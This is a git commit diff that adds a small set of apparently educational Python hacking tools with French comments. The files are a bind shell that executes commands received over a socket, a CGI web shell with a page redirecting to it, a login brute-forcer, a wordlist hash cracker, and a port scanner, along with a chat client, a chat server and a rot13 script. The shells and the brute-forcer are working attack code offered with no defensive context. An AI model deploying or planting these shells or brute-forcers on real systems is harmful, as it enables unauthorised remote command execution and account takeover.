depôt initial

10 files changed, 178 insertions, 0 deletions

diff --git a/bindshell.py b/bindshell.py
new file mode 100644
index 0000000..faa014d
--- /dev/null
+++ b/bindshell.py
@@ -0,0 +1,16 @@
+#!/usr/bin/env python3
+import socket,os
+
+try:
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
+    s.bind(('', 1234))
+    s.listen()
+    conn,addr = s.accept()
+    while 1:
+        data = conn.recv(1024)
+        reponse=os.popen(data.decode()).read()
+        conn.sendall(str(reponse).encode())
+except KeyboardInterrupt:
+    s.close()
+finally:
+    print("bye")
diff --git a/bruteforce.py b/bruteforce.py
new file mode 100644
index 0000000..45d950b
--- /dev/null
+++ b/bruteforce.py
@@ -0,0 +1,27 @@
+import sys
+import requests 
+
+def bruteforce(url,username,password):
+    reponse=requests.post(url=url,data={
+    "username":username,
+    "password":password
+    })
+    #print(reponse.text)
+    if "Mauvais mot de passe" in reponse.text:
+        print("mauvais pwd")
+        return False
+    else:
+        print(f"Trouvé password \"{password}\"")
+        return True
+
+if __name__ == "__main__":
+    url = sys.argv[1]
+    dico = sys.argv[2]
+    with open(dico, 'r') as wordlist:
+        for password in wordlist.readlines():
+            password=password.strip()
+            if bruteforce(url,"jerome",password)==True:
+                sys.exit()
+
+#bruteforce("http://localhost/page.php","jerome","secret")
+
diff --git a/chat_client.py b/chat_client.py
new file mode 100644
index 0000000..0d1d9e8
--- /dev/null
+++ b/chat_client.py
@@ -0,0 +1,15 @@
+#!/usr/bin/env python3
+import socket
+
+try:
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.connect(("localhost", 1234))	# adresse ip + port du serveur (tuple))
+    while 1:
+        message= input()
+        s.sendall(message.encode())
+        data=s.recv(1024)
+        print(data.decode())
+except KeyboardInterrupt:
+    s.close()
+finally:
+    print("bye")
diff --git a/chat_server.py b/chat_server.py
new file mode 100644
index 0000000..d857e99
--- /dev/null
+++ b/chat_server.py
@@ -0,0 +1,18 @@
+#!/usr/bin/env python3
+import socket
+
+try:
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.bind(('', 1234))		# toutes les interfaces réseau sur le port 1234
+    s.listen() 
+    conn,addr = s.accept()
+    while 1:
+        data=conn.recv(1024)
+        print(data.decode())
+        reponse=input()
+        conn.sendall(reponse.encode())
+except KeyboardInterrupt:
+    s.close()
+finally:
+    print("bye")
+
diff --git a/connect.py b/connect.py
new file mode 100644
index 0000000..858d82f
--- /dev/null
+++ b/connect.py
@@ -0,0 +1,14 @@
+import sys
+host=sys.argv[1]
+port=int(sys.argv[2])
+
+import socket
+s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+addr_server=(host,port)
+tentative=s.connect_ex(addr_server) #connect_ex renvoie 0 en cas de succès...
+if tentative==0:
+    print("port 80 ouvert")
+else:
+    print("Echec de connexion")
+s.close()
+
diff --git a/crack_hash.py b/crack_hash.py
new file mode 100644
index 0000000..a8ade90
--- /dev/null
+++ b/crack_hash.py
@@ -0,0 +1,20 @@
+import sys
+import hashlib
+
+def crack_hash(hash,wordlist,hashsum) :
+    """
+    Args:
+        hash : le hash à craquer
+        wordlist : la wordlist à utiliser 
+        hashsum :  md5 ou sha256 ou sha512...
+    """
+    with open(wordlist,"r") as fichier:
+        lignes = fichier.readlines()
+        for ligne in lignes:
+            #if hashlib.md5(ligne.strip().encode()).hexdigest() == hash:
+            if getattr(hashlib, hashsum)(ligne.strip().encode()).hexdigest() == hash :
+                print(f"trouvé : {ligne}")
+                exit()
+
+if __name__ == "__main__":
+    crack_hash(sys.argv[1],sys.argv[2],sys.argv[3])
diff --git a/html/cgi-bin/webshell.cgi b/html/cgi-bin/webshell.cgi
new file mode 100755
index 0000000..6598d37
--- /dev/null
+++ b/html/cgi-bin/webshell.cgi
@@ -0,0 +1,35 @@
+#!/usr/bin/env python3
+
+# après avoir lancé le serveur : python3 -m http.server --cgi
+# placer le script (rendu exécutable) dans /cgi-bin... 
+
+import cgi
+import os
+
+form = cgi.FieldStorage()
+cmd = form.getvalue('command')
+user = os.getlogin()
+host = os.environ.get('SERVER_NAME')
+pwd = os.environ.get('PWD')
+
+print("Content-Type: text/html; charset=UTF-8\n\n")
+print ("""
+<html>
+<head>
+<title>Web shell</title>
+</head>
+<body>
+<h1>Web shell</h1>
+<p>Entrez votre commande : </p>
+<form action=''>
+<input type='text' name='command' id='command' />
+<input type='submit' value='submit' />
+</form>""")
+if cmd : 
+    print("<pre style='display:inline-block;min-width:50em;padding:1em;background-color:black;color:white'>")
+    print(f"{user}@{host}:{pwd}$ {cmd}\n{os.popen(cmd).read()}")
+    print("</pre>")
+print("""
+<script>document.getElementById("command").focus()</script>
+</body>
+</html>""")
diff --git a/html/index.html b/html/index.html
new file mode 100644
index 0000000..ac28908
--- /dev/null
+++ b/html/index.html
@@ -0,0 +1,12 @@
+<!DOCTYPE>
+<html lang="en">
+<head>
+<title>redirection</title>
+<meta http-equiv="refresh" content="0;url=/cgi-bin/webshell.cgi" />
+</head>
+
+<body>
+
+</body>
+
+</html>
diff --git a/rot13.py b/rot13.py
new file mode 100644
index 0000000..f2d97b5
--- /dev/null
+++ b/rot13.py
@@ -0,0 +1,4 @@
+#!/usr/bin/env python3
+import codecs
+message = input()
+print(codecs.encode(message,'rot_13'))
diff --git a/scan.py b/scan.py
new file mode 100644
index 0000000..8b878ef
--- /dev/null
+++ b/scan.py
@@ -0,0 +1,17 @@
+import socket
+
+host="127.0.0.1"
+for port in range(0,65535):
+    try:
+        s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+        s.settimeout(0.5)
+        s.connect((host,port))   # un tuple en argument : (( ))
+        try:
+            banner = s.recv(1024)
+            print("Le port ",port," est ouvert", banner.decode("utf-8").strip())
+        except:
+            print("Le port ",port," est ouvert")
+    except:
+        pass
+
+s.close()